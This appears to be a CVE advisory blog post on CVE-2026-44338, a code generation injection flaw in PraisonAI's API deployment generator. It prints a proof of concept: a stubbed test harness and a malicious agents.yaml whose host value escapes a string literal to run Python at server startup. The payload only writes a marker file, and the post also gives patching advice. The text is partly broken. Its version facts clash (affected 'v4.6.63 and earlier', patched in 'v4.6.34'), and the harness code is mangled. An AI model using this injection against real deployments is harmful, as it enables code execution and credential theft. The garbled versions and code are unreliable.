PraisonAI, Code Generation Injection, CVE-2026-44338 (High) -DC-Oct2026-2962

Listen to this Post

The vulnerability resides in PraisonAI’s API deployment generator, specifically within src/praisonai/praisonai/deploy/api.py, where configuration values parsed from YAML files are unsafely interpolated directly into generated Python source code without proper literal encoding or escaping. When an operator initiates an API deployment flow using agents.yaml, functions like `generate_api_server_code()` and `start_api_server()` process deployment data such as `deploy.api.host` and `agents_file` as raw Python syntax rather than inert strings. Instead of wrapping these values using safe representation methods like `repr()` or json.dumps(), the generator places `config.host` directly between single quotes in the emitted Python code. An attacker who supplies a malicious project configuration can craft a payload containing Python expression splices that break out of the string literal context. Consequently, when the generated server module is compiled and executed at startup, the injected expressions execute with the full privileges of the operator’s process before the Flask application even handles incoming requests. Furthermore, a secondary injection vector exists in agents_file, which is embedded directly into route-handler expressions and evaluated whenever the `/agents` endpoint or related route handlers process requests, leading to arbitrary code execution across multiple application lifecycle stages.

DailyCVE Form:

Platform: PraisonAI
Version: v4.6.63 and earlier
Vulnerability: Code Generation Injection
Severity: High
date: May 12, 2026

Prediction: Patched in v4.6.34

What Undercode Say:

Bash commands and codes related to the blog

`uv run –with pydantic –with pyyaml python pov_deploy_api_config_injection.py /path/to/PraisonAI`

from pathlib import Path
import json
import sys
import tempfile
import types
import yaml
def install_stubs():
class FakeApp:
def <strong>init</strong>(self, name):
self.name = name
def route(self, args, kwargs):
def deco(func):
return func
return deco
def run(self, args, kwargs):
return None
flask = types.ModuleType("flask")
flask.Flask = FakeApp
flask.request = types.SimpleNamespace(headers={}, get_json=lambda: {"message": "hello"})
flask.jsonify = lambda obj: obj
sys.modules["flask"] = flask
flask_cors = types.ModuleType("flask_cors")
flask_cors.CORS = lambda app: app
sys.modules["flask_cors"] = flask_cors
praisonai_mod = types.ModuleType("praisonai")
class FakePraisonAI:
def <strong>init</strong>(self, agent_file):
self.agent_file = agent_file
def run(self):
return "ok"
praisonai_mod.PraisonAI = FakePraisonAI
sys.modules["praisonai"] = praisonai_mod

Exploit: (Educational Purposes!)

An attacker creates a malicious `agents.yaml` file where the `deploy.api.host` configuration parameter is injected with a Python expression splice designed to execute arbitrary code:

deploy:
type: api
api:
host: "' + (<strong>import</strong>(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '"
port: 8005
auth_enabled: false
agents:
- name: demo
role: demo
goal: demo

When `generate_api_server_code()` processes this configuration, the generated code becomes:

app.run(
host='' + (<strong>import</strong>("pathlib").Path("poc.txt").write_text("DEPLOY_API_HOST_CODE_EXECUTED") and "") + '',
port=8005,
debug=False,
)

Executing this module triggers the code execution immediately during server startup before any network traffic is processed.

Protection: from this CVE

Upgrade PraisonAI to version 4.6.34 or later where safe literal encoding is implemented.
Avoid deploying untrusted project configurations or external YAML files from unverified sources.
Ensure deployment values are treated as inert data strings by utilizing `repr()` or `json.dumps()` during code generation.
Audit deployment scripts and runtime environments for unauthorized code execution or modified configuration files.

Impact:

Arbitrary Python code execution within the deploy process when the generated API server starts or handles specific routes. The executing process can access the operator’s environment variables, source code tree, local filesystem files, model and API credentials, as well as deployment credentials, leading to full system or environment compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top